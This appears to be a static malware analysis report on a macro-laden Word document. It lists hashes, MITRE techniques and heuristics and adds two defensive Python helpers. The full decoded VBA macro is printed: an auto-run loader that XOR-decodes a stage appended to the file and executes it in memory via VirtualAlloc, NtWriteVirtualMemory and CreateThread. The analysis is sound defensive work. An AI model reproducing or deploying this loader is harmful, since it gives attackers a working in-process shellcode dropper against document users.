Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 acf5e496f83420df…

MALICIOUS

Office (OLE)

Size: 37.1 KB
Created: 2017-07-26 14:45:00
Authoring application: Microsoft Office Word
First seen: 2017-08-08
MD5: 34c5c7236738611e91b19f447a75fec0
SHA-1: 1e380bcb56778cc1ba349acb1d4b122023885d3e
SHA-256: acf5e496f83420df330753b313b6d8e9a8565dab3367c2333e6fdab31449102c
Risk score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1055 Process Injection (in-process shellcode execution via VirtualAlloc / NtWriteVirtualMemory / CreateThread; nothing in the sample indicates process hollowing)

The sample is a Word document whose VBA project runs automatically on open: Document_Open calls the main routine, and a Workbook_Open stub calls Document_Open so the same code fires if the module is moved into an Excel workbook. The macro itself contains no download logic. It reads its own file from disk (ActiveDocument.FullName), splits the contents on a long random-looking marker string and keeps the text after the last occurrence, which indicates that the second stage is appended to the end of the file rather than stored in the OLE streams. After dropping two bytes, it decodes that blob with a repeating-key XOR (key "GjwWaOOJbVFEAYyHgGHwCPZ"), allocates a buffer with VirtualAlloc (MEM_COMMIT = &H1000, PAGE_EXECUTE_READWRITE = &H40), copies the decoded bytes into it with NtWriteVirtualMemory using the current-process pseudo-handle (-1), and starts it with CreateThread. The shellcode therefore executes inside the Word process without spawning a child process, which defeats detections keyed on process creation. The Win32 and NTDLL imports are declared under random names with the real export carried in the Alias clause, and most identifiers in the module are mangled. The ClamAV name Doc.Downloader.Powload-6809817-0 indicates that the appended stage is a downloader; what it fetches is not visible from static analysis of the macro alone.
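The following Python reproduces the macro's decode path statically so the appended stage can be recovered for further analysis without opening the document in Word. It is an added example, not part of the original report or of the sample. The marker string and XOR key are copied from the carved macro; the two-byte skip mirrors Mid$(s, 3, ...) and "last occurrence" mirrors UBound(Split(...)). It assumes that the StrConv widen/narrow round trips in the macro map each file byte to one character and back under the system ANSI code page (true on CP1252 systems), so the whole decode can be done on raw bytes. The self-test document is constructed and contains no real shellcode.

```python
"""Static extractor for the XOR-encoded stage appended to this document."""
import hashlib
import sys
from typing import Optional

# Marker and key copied from the carved macro (the Split delimiter and the
# first argument of iiGQsHQtgpasu).
MARKER = (b"iWDeHshsaQPReEerUghpuRsVMmCYvreuTYuqkeRNOrUaLnlaOIxKrxjrDIruPiXJMuXfkNhPouBcXsjz"
          b"bBkMTtdwOdNBNxXFulorpfQbBIwWVhtlzSsoYkPsqBqgaFcRwWILeSkWLjllXgAHJBcVe")
XOR_KEY = b"GjwWaOOJbVFEAYyHgGHwCPZ"
# Mid$(s, 3, Len(s)) in the macro drops the first two characters after the marker.
SKIP_AFTER_MARKER = 2


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; mirrors iiGQsHQtgpasu, whose key index is (i - 1) Mod Len(key)."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def extract_payload(doc: bytes, marker: bytes = MARKER, key: bytes = XOR_KEY) -> Optional[bytes]:
    """Return the decoded stage, or None if the marker is absent or nothing follows it."""
    pos = doc.rfind(marker)  # UBound(Split(...)) keeps the text after the LAST marker
    if pos < 0:
        return None
    tail = doc[pos + len(marker) + SKIP_AFTER_MARKER:]
    if not tail:
        return None
    return xor_repeating(tail, key)


def build_test_document(payload: bytes, key: bytes = XOR_KEY) -> bytes:
    """Constructed stand-in for a trojanised .doc: filler, marker, CRLF, XOR'd payload."""
    filler = b"\xd0\xcf\x11\xe0" + b"\x00" * 32  # OLE magic plus padding, constructed
    return filler + MARKER + b"\r\n" + xor_repeating(payload, key)


def main(argv):
    if len(argv) != 2:
        # No path given: run the self-test on a constructed document.
        sample = b"\x90\x90\xcc" + b"constructed-not-real-shellcode"
        ok = extract_payload(build_test_document(sample)) == sample
        print("self-test", "ok" if ok else "FAILED")
        return 0 if ok else 1
    with open(argv[1], "rb") as fh:
        data = fh.read()
    payload = extract_payload(data)
    if payload is None:
        print("marker not found; no appended stage in this file")
        return 1
    out_name = argv[1] + ".payload.bin"
    with open(out_name, "wb") as fh:
        fh.write(payload)
    print(f"wrote {len(payload)} bytes to {out_name}; "
          f"sha256 {hashlib.sha256(payload).hexdigest()}")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it with the path to the .doc as the only argument; the recovered stage is written next to the input for disassembly or sandboxing. The length passed to VirtualAlloc in the macro is the length of the decoded string, so the extracted blob is the exact buffer the Word process would have executed.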

Heuristics 7

  • ClamAV: Doc.Downloader.Powload-6809817-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6809817-0
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API; the import is declared under a randomised name and the real export appears only in the Alias clause
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
        FtGCibuvnHgQ
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
        Document_Open
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the standard DrawingML namespace URI found in ordinary Office files and is not an indicator on its own.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4875 bytes
SHA-256: 9cf9dfbbcbdf91c0bcd4068803c2b8c42ab425915fb222163d79c8beb4bf379d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
38 of 73 identifiers look randomly generated (e.g. 'iWDeHshsaQPReEerUghpuRsVMmCYvreuTYuqkeRN'), consistent with name-mangling obfuscation. The carved artifact contains 1 long base64-like blob; in this module it is the alphanumeric delimiter passed to Split, i.e. a marker that locates the appended stage, not an encoded payload in itself.
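The VirtualAlloc heuristic above still fires despite the renamed identifiers because a Declare statement has to carry the real export somewhere, either as the function name or in the Alias clause. The following Python is an added triage helper, not the scanner that produced these findings and not code from the sample: it recovers the macro's real import table from the Declare lines, lists the APIs in the order they are called in procedure bodies, and checks for the allocate-write-run chain seen in this sample. The VBA excerpt it runs on is a constructed fragment shaped like the carved module, with shortened parameter lists.

```python
"""Resolve aliased Win32/NTDLL Declares in carved VBA and flag a self-injection chain."""
import re
from typing import Dict, List, Sequence

# Constructed excerpt in the shape of the carved macro: randomised wrapper names,
# real exports in the Alias clause, and one Declare that carries no Alias at all.
SAMPLE_VBA = r'''
#If VBA7 Then
Private Declare PtrSafe Function nyihufQoVwZuSRqUwpxYnQN Lib "kernel32" Alias "CreateThread" (ByVal a As Long) As LongPtr
Private Declare PtrSafe Function uFNLBWRvjdKEkYhfxjrCDahxA Lib "kernel32" Alias "VirtualAlloc" (ByVal a As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal h As LongPtr) As LongPtr
#End If
Public Sub FtGCibuvnHgQ()
    p = uFNLBWRvjdKEkYhfxjrCDahxA(0, n, &H1000, &H40)
    r = NtWriteVirtualMemory(-1, p, s, n, 0)
    r = nyihufQoVwZuSRqUwpxYnQN(0, 0, p, 0, 0, 0)
End Sub
'''

DECLARE_RE = re.compile(
    r'^\s*(?:Private|Public)?\s*Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+'
    r'(?P<name>\w+)\s+Lib\s+"(?P<lib>[^"]+)"(?:\s+Alias\s+"(?P<alias>[^"]+)")?',
    re.IGNORECASE | re.MULTILINE,
)

# Minimal allocate -> write -> run chain as used by this sample; extend as needed.
INJECTION_CHAIN = ("VirtualAlloc", "NtWriteVirtualMemory", "CreateThread")


def resolve_declares(vba: str) -> Dict[str, str]:
    """Map each declared VBA name to the export it binds: the Alias if present, else the name."""
    imports: Dict[str, str] = {}
    for m in DECLARE_RE.finditer(vba):
        imports[m.group("name")] = m.group("alias") or m.group("name")
    return imports


def call_order(vba: str, imports: Dict[str, str]) -> List[str]:
    """Real API names in the order their wrappers are called in procedure bodies."""
    order: List[str] = []
    for line in vba.splitlines():
        if re.search(r"\bDeclare\b", line, re.IGNORECASE):
            continue  # the Declare itself is not a call
        for name, api in imports.items():
            if re.search(rf"\b{re.escape(name)}\s*\(", line):
                order.append(api)
    return order


def has_injection_chain(order: Sequence[str], chain: Sequence[str] = INJECTION_CHAIN) -> bool:
    """True if chain occurs as an ordered subsequence of the observed calls."""
    it = iter(order)
    return all(step in it for step in chain)


if __name__ == "__main__":
    imports = resolve_declares(SAMPLE_VBA)
    for wrapper, api in imports.items():
        print(f"{wrapper:32} -> {api}")
    order = call_order(SAMPLE_VBA, imports)
    print("call order:", " -> ".join(order))
    print("self-injection chain:", has_injection_chain(order))
```

Point resolve_declares at the decoded module (macros.bas above) to get the same mapping for the real sample; the two Declare blocks under #If VBA7 / #Else bind the same names to the same exports, so they collapse into one table.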
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

#If VBA7 Then
Private Declare PtrSafe Function nyihufQoVwZuSRqUwpxYnQN Lib "kernel32" Alias "CreateThread" (ByVal BrJdvj As Long, ByVal THdleSOagyrk As Long, ByVal XYhuFhkMxIOuoCRImL As LongPtr, LuPEbD As Long, ByVal mNNdQXdtgCkox As Long, YCvZoRPpWrT As Long) As LongPtr
Private Declare PtrSafe Function uFNLBWRvjdKEkYhfxjrCDahxA Lib "kernel32" Alias "VirtualAlloc" (ByVal gloOBlkrYXwffvGVik As Long, ByVal nOTGyIDnACVzEu As LongPtr, ByVal XtcIcsTzObJP As Long, ByVal vcteoWJNmFQgXYK As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal cxRLPynSzicupfEOShSyjRlI As LongPtr, ByVal CKNlCeujJMESeHWOAEgTpy As LongPtr, ByVal acnQfmGl As String, ByVal jamNzHXdIl As LongPtr, ByRef taWOzVJImeOveCNjpooW As LongPtr) As LongPtr
#Else
Private Declare Function nyihufQoVwZuSRqUwpxYnQN Lib "kernel32" Alias "CreateThread"  (ByVal BrJdvj As Long, ByVal THdleSOagyrk As Long, ByVal XYhuFhkMxIOuoCRImL As Long, LuPEbD As Long, ByVal mNNdQXdtgCkox As Long, YCvZoRPpWrT As Long) As Long
Private Declare Function uFNLBWRvjdKEkYhfxjrCDahxA Lib "kernel32" Alias "VirtualAlloc" (ByVal gloOBlkrYXwffvGVik As Long, ByVal nOTGyIDnACVzEu As Long, ByVal XtcIcsTzObJP As Long, ByVal vcteoWJNmFQgXYK As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal cxRLPynSzicupfEOShSyjRlI As Long, ByVal CKNlCeujJMESeHWOAEgTpy As Long, ByVal acnQfmGl As String, ByVal jamNzHXdIl As Long, ByRef taWOzVJImeOveCNjpooW As Long) As Long
#End If

Const ercmlFbQwjOkTy = &H1000
Const TVyrAqVBTnpoiMRSrHpuihWswYzmm = &H40

Public Sub FtGCibuvnHgQ()
    Dim SCQNfmCty() As Byte

    SCQNfmCty = QzJErMGBSMbpQBfMtxZfKCPN(ActiveDocument.FullName)
    Dim MIZsYPloAHKXaDyAvdhUfGzpx As String
    MIZsYPloAHKXaDyAvdhUfGzpx = StrConv(SCQNfmCty, 64)
    
    Dim aIcPEWhBTTiJwFbtFjzV
    aIcPEWhBTTiJwFbtFjzV = Split(MIZsYPloAHKXaDyAvdhUfGzpx, "iWDeHshsaQPReEerUghpuRsVMmCYvreuTYuqkeRNOrUaLnlaOIxKrxjrDIruPiXJMuXfkNhPouBcXsjzbBkMTtdwOdNBNxXFulorpfQbBIwWVhtlzSsoYkPsqBqgaFcRwWILeSkWLjllXgAHJBcVe")

    Dim npEQzlEMfjKVsPDmLc As String
    Dim nckOLXenJWUTYC As String
    Dim tFgjfxdjIkVmZQPIQEvROo As String
    nckOLXenJWUTYC = StrConv(StrConv(aIcPEWhBTTiJwFbtFjzV(UBound(aIcPEWhBTTiJwFbtFjzV)), 64), 128)
    tFgjfxdjIkVmZQPIQEvROo = Mid$(nckOLXenJWUTYC, 3, Len(nckOLXenJWUTYC))

    npEQzlEMfjKVsPDmLc = iiGQsHQtgpasu("GjwWaOOJbVFEAYyHgGHwCPZ", tFgjfxdjIkVmZQPIQEvROo)
    
    #If VBA7 Then
        Dim OYrFFFECgdjQjYVqTdFr As LongPtr
        Dim DDeQMZgUCQJonzqW As LongPtr
    #Else
        Dim OYrFFFECgdjQjYVqTdFr As Long
        Dim DDeQMZgUCQJonzqW As Long
    #End If

    OYrFFFECgdjQjYVqTdFr = uFNLBWRvjdKEkYhfxjrCDahxA(0, Len(npEQzlEMfjKVsPDmLc), ercmlFbQwjOkTy, TVyrAqVBTnpoiMRSrHpuihWswYzmm)
    DDeQMZgUCQJonzqW = NtWriteVirtualMemory(-1, OYrFFFECgdjQjYVqTdFr, npEQzlEMfjKVsPDmLc, Len(npEQzlEMfjKVsPDmLc), 0)
    DDeQMZgUCQJonzqW = nyihufQoVwZuSRqUwpxYnQN(0, 0, OYrFFFECgdjQjYVqTdFr, 0, 0, 0)
End Sub

Public Function QzJErMGBSMbpQBfMtxZfKCPN(ByVal yOeQygUgKebDKneSKMZeTU As String) As Byte()
    Dim nckOLXenJWUTYC As Long
    Dim tFgjfxdjIkVmZQPIQEvROo() As Byte
    nckOLXenJWUTYC = FreeFile
    If LenB(Dir(yOeQygUgKebDKneSKMZeTU)) Then
        Open yOeQygUgKebDKneSKMZeTU For Binary Access Read As nckOLXenJWUTYC
        ReDim tFgjfxdjIkVmZQPIQEvROo(LOF(nckOLXenJWUTYC) - 1&) As Byte
        Get nckOLXenJWUTYC, , tFgjfxdjIkVmZQPIQEvROo
        Close nckOLXenJWUTYC
    Else
        Err.Raise 53
    End If
    QzJErMGBSMbpQBfMtxZfKCPN = tFgjfxdjIkVmZQPIQEvROo
    Erase tFgjfxdjIkVmZQPIQEvROo
End Function

Public Sub Document_Open()
    FtGCibuvnHgQ
End Sub

Sub Workbook_Open()
    Document_Open
End Sub

Public Function iiGQsHQtgpasu(JOVjTCEQLexUndpCLWfnXbzGKBRQO As String, ZyvKgPzHUMNrxBtyuMeDEdmgaIpp As String) As String
    Dim rKNbOfZzCWzddbtA As Long
    Dim DXnmgeMlsVloJyAjiDbZ As String
    Dim IwtZRQEzAcTG As Integer, TGTVzwLrNOsfNZFDlPhLKyisAdy As Integer, a As Long

    For rKNbOfZzCWzddbtA = 1 To Len(ZyvKgPzHUMNrxBtyuMeDEdmgaIpp)
        a = rKNbOfZzCWzddbtA Mod Len(JOVjTCEQLexUndpCLWfnXbzGKBRQO)
        If a = 0 Then a = Len(JOVjTCEQLexUndpCLWfnXbzGKBRQO)
        
        IwtZRQEzAcTG = Asc(Mid$(ZyvKgPzHUMNrxBtyuMeDEdmgaIpp, rKNbOfZzCWzddbtA, 1))
        TGTVzwLrNOsfNZFDlPhLKyisAdy = Asc(Mid$(JOVjTCEQLexUndpCLWfnXbzGKBRQO, a, 1))
        DXnmgeMlsVloJyAjiDbZ = DXnmgeMlsVloJyAjiDbZ + Chr(IwtZRQEzAcTG Xor TGTVzwLrNOsfNZFDlPhLKyisAdy)
    Next rKNbOfZzCWzddbtA
    
   iiGQsHQtgpasu = DXnmgeMlsVloJyAjiDbZ
End Function